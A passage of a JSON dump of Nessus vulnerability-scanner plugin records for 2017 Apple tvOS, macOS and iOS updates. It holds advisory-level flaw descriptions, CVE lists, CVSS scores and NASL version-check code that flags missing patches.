An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel\n component within the Berkeley Packet Filter (BPF)\n BIOCSBLEN IOCTL due to improper validation of certain\n input when reattaching to an interface. A local attacker\n can exploit this to cause a denial of service condition\n or the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component,\n specifically in the audit_pipe_open() function, when\n handling auditpipe devices due to improper validation of\n certain input. A local attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the\n Security component when parsing X.509 certificates due\n to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due\n to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking\n devices. A local attacker can exploit this to corrupt\n memory, resulting in the execution of arbitrary code\n with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw.
An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207601\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1dbb626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10.2 or later. Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2490\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14W265\";\ntvos_ver = '10.2';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The remote host is running a version of Mac OS X version 10.x prior to 10.12.4 , and is affected by multiple vulnerabilities :\n\n - A format string flaw exists that is triggered as string format specifiers (e.g. %s and %x) are not properly used when handling IPP(S) links. This may allow a context-dependent attacker to potentially execute arbitrary code. (CVE-2017-2403)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API call. This may allow a remote attacker to have an empty signature be accepted as valid. (CVE-2017-2423)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. 
This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. (CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. (CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.
(CVE-2017-2485)\n\nAdditional flaws exist in the following components :\n\n - AppleGraphicsPowerManagement (CVE-2017-2421)\n - AppleRAID (CVE-2017-2438)\n - Bluetooth (CVE-2017-2420, CVE-2017-2427, CVE-2017-2449)\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - CoreMedia (2017-2431)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - EFI (CVE-2016-7585)\n - Finderkit (CVE-2017-2429)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - Hypervisor (CVE-2017-2418)\n - iBooks (CVE-2017-2426)\n - IOATAFamily (CVE-2017-2408)\n - IOFireWireAVC (CVE-2017-2436, CVE-2017-2437)\n - IOFireWireFamily (CVE-2017-2388)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Intel Graphics (CVE-2017-2443)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2410, 2017-2440, 2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2489, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - libxslt (CVE-2017-2477)\n - MCX (CVE-2017-2402)\n - Menus (CVE-2017-2409)\n - Multi-touch (CVE-2017-2422)\n - nghttp2 (CVE-2017-2428)\n - QuickTime (2017-2413)\n - Security (2017-2451, 2017-6974)\n - SecurityFoundation (CVE-2017-2425)\n - sudo (CVE-2017-2381)\n - WebKit (CVE-2017-2392, CVE-2017-2457, CVE-2017-2486)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Mac OS X 10.x < 10.12.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2392", "CVE-2017-2457", "CVE-2016-7585", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", 
"CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-6974", "CVE-2017-2486"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*"], "id": "700032.PRM", "href": "https://www.tenable.com/plugins/nnm/700032", "sourceData": "Binary data 700032.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The version of iOS running on the mobile device is prior to 10.3, and is affected by multiple vulnerabilities :\n\n - An unspecified state management flaw exists that may allow a context-dependent attacker to spoof the address bar. No further details have been provided. (CVE-2017-2376)\n - An unspecified flaw exists in the handling of HTTP authentication. This may allow a context-dependent attacker to display authentication sheets on arbitrary web sites and cause a denial of service. (CVE-2017-2389)\n - A flaw exists in the password-protected PDF export feature that is triggered as a weak encryption algorithm is used. This may allow an attacker with access to a password-protected document to potentially disclose the document content. (CVE-2017-2391)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API calls. This may allow a remote attacker to have an empty signature be accepted as valid. 
(CVE-2017-2423)\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - DataAccess (CVE-2017-2414)\n - FontParser (CVE-2017-2406, CVE-2017-2407)\n - iCloud (CVE-2017-2397)\n - ImageIO (CVE-2017-2416)\n - iTunes Store (CVE-2017-2412)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2490)\n - libarchive (CVE-2017-2390)\n - Pasteboard (CVE-2017-2399)\n - Quick Look (CVE-2017-2404)\n - Safari (CVE-2017-2384, CVE-2017-2393, CVE-2017-2400)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2423", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2448", "CVE-2017-2450", 
"CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2404", "CVE-2017-2389", "CVE-2017-2399", "CVE-2017-2453", "CVE-2017-2486", "CVE-2017-2412", "CVE-2017-2444", "CVE-2017-2397", "CVE-2017-2414", "CVE-2017-2434", "CVE-2017-2384", "CVE-2017-2393", "CVE-2017-2400", "CVE-2017-2452", "CVE-2017-2378", "CVE-2017-2424", "CVE-2017-2391"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700034.PRM", "href": "https://www.tenable.com/plugins/nnm/700034", "sourceData": "Binary data 700034.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T14:20:58", "description": "The version of Apple iOS running on the mobile device is prior to 10.3. It is, therefore, affected by multiple vulnerabilities in multiple components, the majority of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. 
The affected components are as follows :\n\n - Accounts\n - Audio\n - Carbon\n - CoreGraphics\n - CoreText\n - DataAccess\n - FontParser\n - HomeKit\n - HTTPProtocol\n - ImageIO\n - iTunes Store\n - JavaScriptCore\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - libxslt\n - Pasteboard\n - Phone\n - Profiles\n - Quick Look\n - Safari\n - Safari Reader\n - SafariViewController\n - Security\n - Siri\n - WebKit\n - WebKit JavaScript Bindings\n - WebKit Web Inspector", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", 
"CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-6976"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "APPLE_IOS_103_CHECK.NBIN", "href": "https://www.tenable.com/plugins/nessus/99127", "sourceData": "Binary data apple_ios_103_check.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-11T15:09:49", "description": "The remote host is running a version of macOS that is 10.12.x prior to 10.12.4. It is, therefore, affected by multiple vulnerabilities in multiple components, some of which are remote code execution vulnerabilities. An unauthenticated, remote attacker can exploit these remote code execution vulnerabilities by convincing a user to visit a specially crafted website, resulting in the execution of arbitrary code in the context of the current user. The affected components are as follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0736", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", 
"CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", 
"CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/o:apple:macos"], "id": "MACOS_10_12_4.NASL", "href": "https://www.tenable.com/plugins/nessus/99134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99134);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-3619\",\n \"CVE-2016-4688\",\n \"CVE-2016-5387\",\n \"CVE-2016-5636\",\n \"CVE-2016-7056\",\n \"CVE-2016-7585\",\n \"CVE-2016-7922\",\n \"CVE-2016-7923\",\n \"CVE-2016-7924\",\n \"CVE-2016-7925\",\n \"CVE-2016-7926\",\n \"CVE-2016-7927\",\n \"CVE-2016-7928\",\n \"CVE-2016-7929\",\n \"CVE-2016-7930\",\n \"CVE-2016-7931\",\n \"CVE-2016-7932\",\n \"CVE-2016-7933\",\n \"CVE-2016-7934\",\n \"CVE-2016-7935\",\n \"CVE-2016-7936\",\n \"CVE-2016-7937\",\n \"CVE-2016-7938\",\n \"CVE-2016-7939\",\n \"CVE-2016-7940\",\n \"CVE-2016-7973\",\n \"CVE-2016-7974\",\n \"CVE-2016-7975\",\n \"CVE-2016-7983\",\n \"CVE-2016-7984\",\n \"CVE-2016-7985\",\n \"CVE-2016-7986\",\n \"CVE-2016-7992\",\n \"CVE-2016-7993\",\n \"CVE-2016-8574\",\n \"CVE-2016-8575\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\",\n \"CVE-2016-9533\",\n \"CVE-2016-9535\",\n \"CVE-2016-9536\",\n \"CVE-2016-9537\",\n \"CVE-2016-9538\",\n \"CVE-2016-9539\",\n \"CVE-2016-9540\",\n \"CVE-2016-9586\",\n \"CVE-2016-9935\",\n \"CVE-2016-10009\",\n \"CVE-2016-10010\",\n \"CVE-2016-10011\",\n \"CVE-2016-10012\",\n \"CVE-2016-10158\",\n \"CVE-2016-10159\",\n \"CVE-2016-10160\",\n \"CVE-2016-10161\",\n \"CVE-2017-2379\",\n \"CVE-2017-2381\",\n \"CVE-2017-2388\",\n \"CVE-2017-2390\",\n \"CVE-2017-2398\",\n \"CVE-2017-2401\",\n \"CVE-2017-2402\",\n \"CVE-2017-2403\",\n \"CVE-2017-2406\",\n \"CVE-2017-2407\",\n \"CVE-2017-2408\",\n \"CVE-2017-2409\",\n \"CVE-2017-2410\",\n \"CVE-2017-2413\",\n 
\"CVE-2017-2416\",\n \"CVE-2017-2417\",\n \"CVE-2017-2418\",\n \"CVE-2017-2420\",\n \"CVE-2017-2421\",\n \"CVE-2017-2422\",\n \"CVE-2017-2423\",\n \"CVE-2017-2425\",\n \"CVE-2017-2426\",\n \"CVE-2017-2427\",\n \"CVE-2017-2428\",\n \"CVE-2017-2429\",\n \"CVE-2017-2430\",\n \"CVE-2017-2431\",\n \"CVE-2017-2432\",\n \"CVE-2017-2435\",\n \"CVE-2017-2436\",\n \"CVE-2017-2437\",\n \"CVE-2017-2438\",\n \"CVE-2017-2439\",\n \"CVE-2017-2440\",\n \"CVE-2017-2441\",\n \"CVE-2017-2443\",\n \"CVE-2017-2448\",\n \"CVE-2017-2449\",\n \"CVE-2017-2450\",\n \"CVE-2017-2451\",\n \"CVE-2017-2456\",\n \"CVE-2017-2458\",\n \"CVE-2017-2461\",\n \"CVE-2017-2462\",\n \"CVE-2017-2467\",\n \"CVE-2017-2472\",\n \"CVE-2017-2473\",\n \"CVE-2017-2474\",\n \"CVE-2017-2477\",\n \"CVE-2017-2478\",\n \"CVE-2017-2482\",\n \"CVE-2017-2483\",\n \"CVE-2017-2485\",\n \"CVE-2017-2487\",\n \"CVE-2017-2489\",\n \"CVE-2017-2490\",\n \"CVE-2017-5029\",\n \"CVE-2017-5202\",\n \"CVE-2017-5203\",\n \"CVE-2017-5204\",\n \"CVE-2017-5205\",\n \"CVE-2017-5341\",\n \"CVE-2017-5342\",\n \"CVE-2017-5482\",\n \"CVE-2017-5483\",\n \"CVE-2017-5484\",\n \"CVE-2017-5485\",\n \"CVE-2017-5486\",\n \"CVE-2017-6974\",\n \"CVE-2017-7070\"\n );\n script_bugtraq_id(\n 85919,\n 91247,\n 91816,\n 94572,\n 94650,\n 94742,\n 94744,\n 94745,\n 94746,\n 94747,\n 94753,\n 94754,\n 94846,\n 94968,\n 94972,\n 94975,\n 94977,\n 95019,\n 95076,\n 95077,\n 95078,\n 95375,\n 95764,\n 95768,\n 95774,\n 95783,\n 95852,\n 96767,\n 97132,\n 97134,\n 97137,\n 97140,\n 97146,\n 97147,\n 97300,\n 97301,\n 97303\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-03-27-3\");\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n script_xref(name:\"EDB-ID\", value:\"40962\");\n\n script_name(english:\"macOS 10.12.x < 10.12.4 Multiple Vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks the version of macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is 
missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS that is 10.12.x prior to\n10.12.4. It is, therefore, affected by multiple vulnerabilities in\nmultiple components, some of which are remote code execution\nvulnerabilities. An unauthenticated, remote attacker can exploit these\nremote code execution vulnerabilities by convincing a user to visit a\nspecially crafted website, resulting in the execution of arbitrary\ncode in the context of the current user. The affected components are\nas follows :\n\n - apache\n - apache_mod_php\n - AppleGraphicsPowerManagement\n - AppleRAID\n - Audio\n - Bluetooth\n - Carbon\n - CoreGraphics\n - CoreMedia\n - CoreText\n - curl\n - EFI\n - FinderKit\n - FontParser\n - HTTPProtocol\n - Hypervisor\n - iBooks\n - ImageIO\n - Intel Graphics Driver\n - IOATAFamily\n - IOFireWireAVC\n - IOFireWireFamily\n - Kernel\n - Keyboards\n - libarchive\n - libc++abi\n - LibreSSL\n - MCX Client\n - Menus\n - Multi-Touch\n - OpenSSH\n - OpenSSL\n - Printing\n - python\n - QuickTime\n - Security\n - SecurityFoundation\n - sudo\n - System Integrity Protection\n - tcpdump\n - tiffutil\n - WebKit\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207615\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddb4db4a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpoxy.org\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.12.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5636\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, 